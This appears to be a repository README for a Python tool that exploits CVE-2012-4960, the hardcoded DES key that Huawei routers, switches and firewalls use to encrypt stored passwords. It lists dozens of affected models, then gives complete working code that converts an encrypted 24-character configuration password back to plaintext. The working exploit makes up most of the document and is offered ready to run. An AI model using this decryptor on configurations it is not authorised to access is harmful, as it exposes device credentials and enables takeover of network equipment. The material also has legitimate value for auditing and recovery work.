# Decrypt passwords for Huawei routers and switches/CVE-2012-4960
In multiple Huawei products, DES encryption algorithm is used for password and the 

encryption is not strong enough so it may be cracked.

This Vulnerability has been assigned Common Vulnerabilities and Exposures (CVE) ID: 

CVE-2012-4960.

# requirements
* install [python](https://www.python.org/) 
   * install [pycryptodome](https://pypi.org/project/pycryptodome/)
 
     
# Affected products known to date/CVE-2012-4960

* CX200/CX300
* CX600
* NE5000E
* MA5200G
* NE40E/80E
* ATN
* NE40/NE80
* NE20E-X6
* NE20
* ME60
* ACU
* WLAN AC 6605
* S9300
* S7700
* S2300/S3300/S5300
* S2300/S3300/S5300/S2700/S3
700/S5700
* S2300/S3300/S5300/S3300HI/
S5300HI/S5306/S6300/S2700/
S3700/S5700/S6700
* AR G3
* H3C AR(OEM IN)
* AR 19/29/49
* Eudemon100E
* Eudemon200
* Eudemon300&500&1000
* Eudemon1000E-U/USG5300
* Eudemon1000E-X/USG5500
* Eudemon8080E&8160E/USG9300
* Eudemon8000E-X/USG9500
* E200E-C&X3&X5&X7/USG2200&5100
* E200E-B&X1&X2/USG2100
* SVN5300
* SVN2000&5000 series
* SVN3000
* NIP100/200/1000
* NIP2100&2200&5100
  
# Others
* S3500

# The performance of this code has been tested and verified in  

* Huawei CX200
* Huawei S3500

# Code

```

from Crypto.Cipher import DES
import binascii

def decode_char(c):
    if c == 'a':
        r = '?'
    else:
        r = c
    return ord(r) - ord('!')

def ascii_to_binary(s):
    assert len(s) == 24

    out = [0]*18
    i = 0
    j = 0

    for i in range(0, len(s), 4):
        y = decode_char(s[i + 0])
        y = (y << 6) & 0xffffff

        k = decode_char(s[i + 1])
        y = (y | k) & 0xffffff
        y = (y << 6) & 0xffffff

        k = decode_char(s[i + 2])
        y = (y | k) & 0xffffff
        y = (y << 6) & 0xffffff

        k = decode_char(s[i + 3])
        y = (y | k) & 0xffffff

        out[j+2] = chr(y & 0xff)
        out[j+1] = chr((y>>8) & 0xff)
        out[j+0] = chr((y>>16) & 0xff)

        j += 3

    return "".join(out)

def decrypt_password(p):

    r = ascii_to_binary(p)
    r = r[:16]

    d = DES.new(b"\x01\x02\x03\x04\x05\x06\x07\x08", DES.MODE_ECB)
    
    r_bytes = r.encode('latin-1')
    r = d.decrypt(r_bytes)
       
    return r.rstrip(b"\x00").decode('latin-1')


#the encrypted key must be 24 characters long

int = r"""Please insert the encrypted password here and respect the triple " on each side"""


print(decrypt_password(int))

```
